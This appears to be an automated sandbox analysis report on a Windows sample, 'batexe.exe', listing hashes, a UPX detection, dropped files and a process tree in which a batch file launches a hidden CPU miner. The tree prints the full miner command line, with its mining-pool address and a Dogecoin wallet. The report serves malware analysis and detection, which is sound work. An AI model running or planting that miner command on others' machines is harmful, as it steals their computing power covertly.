73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21-02-2024 02:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3560	b2e.exe
4204	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4204	cpuminer-sse2.exe
4204	cpuminer-sse2.exe
4204	cpuminer-sse2.exe
4204	cpuminer-sse2.exe
4204	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3172-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3172 wrote to memory of 3560	3172	batexe.exe	74
PID 3172 wrote to memory of 3560	3172	batexe.exe	74
PID 3172 wrote to memory of 3560	3172	batexe.exe	74
PID 3560 wrote to memory of 2876	3560	b2e.exe	75
PID 3560 wrote to memory of 2876	3560	b2e.exe	75
PID 3560 wrote to memory of 2876	3560	b2e.exe	75
PID 2876 wrote to memory of 4204	2876	cmd.exe	78
PID 2876 wrote to memory of 4204	2876	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3172
- C:\Users\Admin\AppData\Local\Temp\AD66.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\AD66.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\AD66.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B362.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AD66.tmp\b2e.exe

Filesize
5.8MB

MD5
63444b3397cd622927fb4ebc9b23b986

SHA1
a22495bbf2c4c4c21c0a0be5e4fbeb4e22cd79de

SHA256
aac310e55026c5b4795d73c65081cddc04fb8b3eab37a10441b57c31b503fd10

SHA512
fd3bd968d36b502dde5311aaa214c5b501d4747f02aff75157ece4556dd887334ab7815dce48ebaaf29dd3537bbca3df30d20f43343823fc4b7c0c5614bfb93f

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD66.tmp\b2e.exe

Filesize
13.4MB

MD5
270c1bdcce4e340948d63fd5a20546d1

SHA1
46922d1c230850cba16370584792bc8ad1aef127

SHA256
532f4552fbe58072252630617e49d57591269f83596fc487f7de0baad1afbd15

SHA512
857e49e369d92a38332c955c3114fe00a9fb0142e7cc31dc3d9f9d1a5e4b3b3de18a35b5e94658d4609e11d09ea5df207641fee14d059d4eb4e306a7e08580fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\B362.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
832KB

MD5
43dd8ab1a0fd7f177db516faa81a9635

SHA1
66a8b6940797f3396a4f1a6deafca1fda5bffcdd

SHA256
d4b58fa7e09511b58f312b57e2067823a7f31ff5cd6369cbf5ef3667c27b60ea

SHA512
064753e38fb6e2d64a8ce067a52c24b55eb11cf714a534f3557a0e2bd2f5fba16030d8496c7787f4b272ae6a696f4b017d99771488832d12711a7158c927f772

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
64KB

MD5
42871db599b90c630b2d75268c8b0116

SHA1
fb3a97b9517d4abe248a7c1a0fe0f528f40b29bc

SHA256
80110dd27dac90724987601037bc7d4bccdce1afd95aeffbfd8cacd813b891cb

SHA512
c32a1b46ab54abcaf179759b2aaa5aeec58a353ebe552b09ce1980ab54a9c702ae1e348c2a9c2020f74fa7c7bfb4d4bac78396f76b6bac04227436deca800438

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
676KB

MD5
9ef1f4a6c5c3a4d644ec15922b03b0c0

SHA1
3a8c4864ac6e929ae644c89e587c8a7844b2c849

SHA256
99099f37a953390c1b57f384f29e95551d6b25c0735d6bb0596e7358dec7bae4

SHA512
ea969a38572fc43c01fbf4949c9bcbb03d6f7245b395b93b5682f3d8bcf33ebf1f1eba17de0836ecec4a1f5210c98f4fa20dc914ee4deaa9428cea5135342197

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
775KB

MD5
a5c7f7e90a3a1c6b339a1126ad99a739

SHA1
5fee53f622a47fffdbf2014ab3956910dd2da2c1

SHA256
96c46c15db4d2eb4ea38f1e3bf73ac672de979efffe5b8ed85b6d95984b4bca5

SHA512
47dc4d7b920122170c655555707c914507460efe632a1597ccc7e28a59f5bc6e66b6c90d3f9792874dc793344b25976f3f8ce3dc073999df3bacf6c84691db88

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
768KB

MD5
613807ad6d525aded318b643c33bc17e

SHA1
2c9a4180140838c69c20bc4047c3d2d777d3bee4

SHA256
896775bd33edafb0d219d1ae3e973e71aa29a4937d0252bd3a4cad074c004971

SHA512
d688b0f2570944898097dcc6acb56b3a4c901073f0ce22b5ea260b05a37fe2840d84b44e7aa74c7d73078b0e5a45c24994852f5c03f049982b6ddca6ead89539

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
531KB

MD5
bd9860a2cdaa4459ca93668aaa481c60

SHA1
bfe527f2ed500186351f61770fe8d0cd1476de82

SHA256
23e9b4ffdb85144edacfd72b5243474cf0ff91da77b883c79eae7d7ff3659fdb

SHA512
330a697985785a932e4e3fa585a4a1b432ad8359209cc0fd7ac52e893f9e2d9d07122291ea342ad33c4b7907fc016f1c4743621f0b4c843a5335248e8168a45b

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
723KB

MD5
7979855be11bdca9322d7a180cdf9e27

SHA1
b6887bd4865506c7cf3878e5b8375886059e1d8e

SHA256
dfddc7143559fee8b38389b2a98fb15dbad5372bc078d38f26d57bd0ef33a29a

SHA512
8aac1d1ac65342ace25597fe4ebb458031ff733c089c66d6ca09e0cd5188d52e91717a28f40a25a88905e8aa691885f28a60d5ab1f94582724ae98e320bffd36

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
576KB

MD5
13746f79a51eb8ce3107de99ffc6b56a

SHA1
64a00c99a805f8775f08cda4e4d06e1150195347

SHA256
2c04d5960f13e859d49c78a8858bdcb0c53914306eba52746105a76d98f5d205

SHA512
d0e69c6cf0078c858e8258a4038098e644d611b544b6588b2b1c9d2d2937ade0472edc96257545f5935514bfa18970f5762eb393def612c5a7027727397ca8d7

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
559KB

MD5
579f73baadb18bef9a2a6fd236bdb5d4

SHA1
2f232693061fdb8ef0c20b81c3f67cc702b7eb76

SHA256
7f2a80aeb169f12ab2736012f07abfefc1657529e9dac7a40c0ec8fc9eb9d095

SHA512
62b69648657c6a5fd80f94d8c0876b5d295f7712eade50a87cfd7a69fb1931bc6df584e53a5b3871c1804a8bf6e2029945827580ec725952b79376243814bed7

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
576KB

MD5
2caab2ad7ccd18421c96ea2ef5b9e602

SHA1
a629673c12e88ef88f30cbe8da12d3afb9a7d42c

SHA256
c16fbf658c970a716b976abe7c5d9f1b1a42dacd55a43b16fec0ecc6b84f0552

SHA512
aa9692584947d7fdbe843e877430ade40c5b4c6e15887005a292065d6f8e1303abc8dfc2bf50c01fb032bdfeca5bb2aa9312ba44d7ba4e2d3529d07bfd008969

Download Submit
memory/3172-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3560-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3560-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4204-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4204-43-0x0000000067DF0000-0x0000000067E88000-memory.dmp

Filesize
608KB

Download
memory/4204-44-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/4204-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4204-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4204-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download